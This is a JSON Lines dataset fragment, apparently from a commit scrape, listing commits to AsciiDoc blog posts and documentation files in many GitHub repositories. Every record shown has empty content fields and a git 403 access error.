access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e25edff1be9b46dee0d2fe289cbec4fa733e31bd","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 
2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0cae3734a694e901c93f6876fdda16b1728c357","subject":"Update 2018-09-16-Vuex.adoc","message":"Update 2018-09-16-Vuex.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-16-Vuex.adoc","new_file":"_posts\/2018-09-16-Vuex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78e0b977ebf6be14f751e9c7c8296560e8595307","subject":"Update 2016-10-05-Maybe-not-quite-the-Chamber-of-Reflection.adoc","message":"Update 2016-10-05-Maybe-not-quite-the-Chamber-of-Reflection.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-10-05-Maybe-not-quite-the-Chamber-of-Reflection.adoc","new_file":"_posts\/2016-10-05-Maybe-not-quite-the-Chamber-of-Reflection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8acf7ff698ac9501a1471b0d04ef49b83884b8ed","subject":"Updated README","message":"Updated README\n","repos":"mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,goldobin\/resilience4j","old_file":"src\/docs\/asciidoc\/introduction.adoc","new_file":"src\/docs\/asciidoc\/introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12d3fd7ae7b2009dc4d77f0d5b7aa92fad8ddef4","subject":"Proposed Blog Post Template","message":"Proposed Blog Post Template\n\nI think I've covered the basics in here. 
All you'll need to do is add placeholder images in the code so they render the examples","repos":"alchapone\/alchapone.github.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,lametaweb\/lametaweb.github.io,TheAshwanik\/new,TheAshwanik\/new,alchapone\/alchapone.github.io,TheAshwanik\/new,Git-Host\/Git-Host.io,alchapone\/alchapone.github.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,Git-Host\/Git-Host.io,demo-hubpress\/demo-hubpress.github.io,Git-Host\/Git-Host.io,anthonny\/dev.hubpress.io","old_file":"docs\/Template.adoc","new_file":"docs\/Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e9dfb334889258ff9205004ed8a851e1bc67d83","subject":"Docs: Specify that byte units use powers of 1024 (#23574)","message":"Docs: Specify that byte units use powers of 1024 (#23574)\n\nIn SI units, \"kilobyte\" or \"kB\" would mean 1000 bytes, whereas \"KiB\" is\r\nused for 1024. Add a note in `api-conventions.asciidoc` to clarify the\r\nmeaning in Elasticsearch.","repos":"brandonkearby\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,Shepard1212\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,vroyer\/elassandra,mohit\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,glefloch\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elastics
earch,sneivandt\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,glefloch\/elasticsearch,uschindler\/elasticsearch,nazarewk\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elasticassandra,shreejay\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,glefloch\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,kalimatas\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,vroyer\/elasticassandra,nezirus\/elasticsearch,coding0011\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,kalimatas\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,ZTE-PaaS\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,Shepard1212\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,jprante\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,IanvsPoplicola\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch,jprante\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch","old_
file":"docs\/reference\/api-conventions.asciidoc","new_file":"docs\/reference\/api-conventions.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8494def943e1ea17cbaf6551c21af3af6df8766","subject":"Update 2015-06-08-Desarrollo-de-una-aplicacion-desde-cero-Diseno-e-implementacion-de-la-capa-de-persistencia.adoc","message":"Update 2015-06-08-Desarrollo-de-una-aplicacion-desde-cero-Diseno-e-implementacion-de-la-capa-de-persistencia.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-06-08-Desarrollo-de-una-aplicacion-desde-cero-Diseno-e-implementacion-de-la-capa-de-persistencia.adoc","new_file":"_posts\/2015-06-08-Desarrollo-de-una-aplicacion-desde-cero-Diseno-e-implementacion-de-la-capa-de-persistencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf39ac1f2f093b399abf541b8e90d03b9c4ba899","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d810e173bd863b94d8421a8b6ed31f69a8210eaf","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f2fbe630f1c16d9daee2c8ce2d8ae6f38592a86","subject":"Update 2016-04-05-Local-File-Inclusion.adoc","message":"Update 2016-04-05-Local-File-Inclusion.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c73a7bda122754d2aa2a425214f9a03b0f47c604","subject":"Update 2018-03-11-Using-camera-with-Java-Script-on-desktop.adoc","message":"Update 
2018-03-11-Using-camera-with-Java-Script-on-desktop.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2018-03-11-Using-camera-with-Java-Script-on-desktop.adoc","new_file":"_posts\/2018-03-11-Using-camera-with-Java-Script-on-desktop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee6f21f07d37b510d95666bfea845435f948928d","subject":"NMS-6687: Initial revision of SshMonitor","message":"NMS-6687: Initial revision of SshMonitor\n\nhttp:\/\/issues.opennms.org\/browse\/NMS-6687\n\nCyrille\n","repos":"tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/SshMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/SshMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"9dff60d10a06330c875a19f21c637494cd30f40b","subject":"Remove migration error message","message":"Remove migration error message\n","repos":"mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework","old_file":"documentation\/articles\/UsingDeclarativeServices.asciidoc","new_file":"documentation\/articles\/UsingDeclarativeServices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80dcfd27357b93e9fe8c17324fabdd15dcb6c7f4","subject":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac5c46dde40b00c771d3050f1f892ab79eddfe57","subject":"Create Contributing.adoc","message":"Create 
Contributing.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/Contributing.adoc","new_file":"wiki\/Contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1f16193eb7e67a912668bb6bf472d48a92504a5","subject":"Update 2016-08-18-The-easiest-way-to-run-Pokemon-Go-Bot-with-Docker.adoc","message":"Update 2016-08-18-The-easiest-way-to-run-Pokemon-Go-Bot-with-Docker.adoc","repos":"locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io","old_file":"_posts\/2016-08-18-The-easiest-way-to-run-Pokemon-Go-Bot-with-Docker.adoc","new_file":"_posts\/2016-08-18-The-easiest-way-to-run-Pokemon-Go-Bot-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/locnh\/locnh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39dca9772c7a5f95b5cf74c4c7dc566b6b33e60d","subject":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","message":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83877ea694fdaad898577fd523f86072cf8a2562","subject":"Fix content type in Watcher docs","message":"Fix content type in Watcher docs\n\nWith this commit we change the incorrect content type `image.png` to `image\/png`\r\nin an example snippet in the Watcher docs.\r\n\r\nRelates 
#33955","repos":"gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"x-pack\/docs\/en\/watcher\/actions\/email.asciidoc","new_file":"x-pack\/docs\/en\/watcher\/actions\/email.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f733317869b4500683214040207dd0ec7fd447f7","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81d5008e970fc9260125a5dc09746899c8490777","subject":"Build from source in debug mode on OS X","message":"Build from source in debug mode on OS X\n\nKudu fails to link when building in release mode on OS X because of missing\nlibc++ symbols in the Boost static library. 
This will no longer be an issue when\nwe move to c++11, and begin linking against libc++ on OS X.\n\nChange-Id: Ief9ff98578069c35eb54576f8e262b43afbc5569\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1536\nReviewed-by: David Ribeiro Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\nTested-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@danburkert.com>\n","repos":"helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83c473c0139b4d57c4841397e4362a238dc0819a","subject":"Update 2017-11-28-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-28-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-28-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-28-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9001d30306b869d22acb245a65464e38496ad7d5","subject":"Update 2016-04-18-Bite-Sized-Angular-Update-route-without-reload.adoc","message":"Update 2016-04-18-Bite-Sized-Angular-Update-route-without-reload.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2016-04-18-Bite-Sized-Angular-Update-route-without-reload.adoc","new_file":"_posts\/2016-04-18-Bite-Sized-Angular-Update-route-without-reload.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e5a651c8e052cdbcad73f6af5ce065ffd6dbce4","subject":"minor update doc","message":"minor update doc\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_analytics.asciidoc","new_file":"doc\/trex_analytics.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b493e88846f2ae50a82edb3cf8086d90db11b3c","subject":"Adding post 'Five Advantages of Log-Based CDC'","message":"Adding post 'Five Advantages of Log-Based CDC'\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-07-19-advantages-of-log-based-change-data-capture.adoc","new_file":"blog\/2018-07-19-advantages-of-log-based-change-data-capture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66f132759bd41d88fe5a4397a0e9a776752472cb","subject":"Update 2017-09-09.adoc","message":"Update 2017-09-09.adoc","repos":"qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io","old_file":"_posts\/2017-09-09.adoc","new_file":"_posts\/2017-09-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qu85101522\/qu85101522.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65eee7b112d9e13a233cf14219e2bb40429640cc","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eb5ac5c7abc2b94138ee32a85a217fd6f162c36","subject":"y2b create post This iPhone Case Helps You Start New Relationships","message":"y2b create post This iPhone Case Helps You Start New Relationships","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-10-This-iPhone-Case-Helps-You-Start-New-Relationships.adoc","new_file":"_posts\/2016-08-10-This-iPhone-Case-Helps-You-Start-New-Relationships.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e38f0234c9d9ae889fa786539136b973ba80d98e","subject":"README: use spaces for indentation","message":"README: use spaces for indentation\n","repos":"pjanouch\/sdn","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdn.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"f079075f4b25ef00c660ac4bce7d116e27b48856","subject":"Update README","message":"Update README\n","repos":"pjanouch\/json-rpc-shell,pjanouch\/json-rpc-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 